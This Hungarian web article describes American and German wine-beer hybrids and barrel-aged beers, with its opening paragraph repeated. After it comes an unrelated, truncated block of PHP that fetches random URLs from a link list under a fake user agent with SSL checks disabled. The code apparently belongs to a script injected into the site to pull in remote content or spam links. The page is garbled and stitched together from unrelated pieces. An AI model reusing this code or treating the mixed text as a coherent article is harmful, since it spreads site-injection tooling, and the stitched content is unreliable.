Ön megkóstolná a bor-sör hibridet?

Sörre bor, bármikor, borra sör, meggyötör? Ha hiszünk ebben az aranyszabályban, akkor meglehetősen összezavaró lehet a bor-sör hibrid létezése. Már csak azért is, mert általában az emberek vagy az egyiket szeretik, vagy a másikat. Forrás: www.startribune.com Az amerikai kézműves sörfőzdékben viszont már két évtizede kísérleteznek ezekkel a különleges italokkal. A technikájuk azon alapszik, hogy a... Tovább..


Sörre bor, bármikor, borra sör, meggyötör? Ha hiszünk ebben az aranyszabályban, akkor meglehetősen összezavaró lehet a bor-sör hibrid létezése. Már csak azért is, mert általában az emberek vagy az egyiket szeretik, vagy a másikat.

Forrás: www.startribune.com

Az amerikai kézműves sörfőzdékben viszont már két évtizede kísérleteznek ezekkel a különleges italokkal. A technikájuk azon alapszik, hogy a sört már korábban is használt hordóban érlelik – olyan hordóban, amiben addig bourbon, whiskey vagy a legutóbbi trend szerint, bor öregedett. Az így átlényegült sör főleg a Minnesota környéki sörfőzdék különlegessége.

A Minneapolis Town Hall sörfőzde már a korai 2000-es évektől kezdve foglalkozik a hordóban érlelt sörrel, így az övék az egyik legrégebbi, és a szakértők szerint a legjobb ilyen program az Egyesült Államokban. A Barrel-Aged Beer Weekre, amit minden februárban megrendeznek, egész tömegek gyűlnek össze, hogy megkóstolják a hordós ízvilágú söröket.

Létezik más megoldás is: a Boulder Brewing Dude’s D’Spare itala stoutként kezdi, és borként végzi. A csokoládés, kávés ízjegyekkel, karamelles ízzel nyitó sör végül a Cabernet fekete bogyós, száraz ízébe hajlik át.

Európában a G. Schneider & Sohn sörfőzdére érdemes figyelni a hibridek tekintetében. A legöregebb német búzasörfőzde Cuvée Barrique nevű hibridje egy keverék, az erős Aventinus Weizenbock és még erősebb Weizen Eisbock egyvelege, amit aztán chardonnay hordókban érlelnek. Így a két alapsör édes ízét elüti a chardonnay grapefruitos, citrusos kesernyéssége.

Ha pedig az ünnepekhez illő italt keresünk, akkor érdemes vadászni a minneapolisi BrewCo Halucidation bor-sör hibridjére, amit a főzde évek óta karácsonykor dob piacra. A 15 fokos, belga ihletésű ital borhoz méltó alkoholszázaléka ellenére pont olyan könnyen fogyasztható, mint bármelyik hideg sör, töltsük akár tulipán, akár Bordeaux pohárba.

Forrás: Startribune


html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>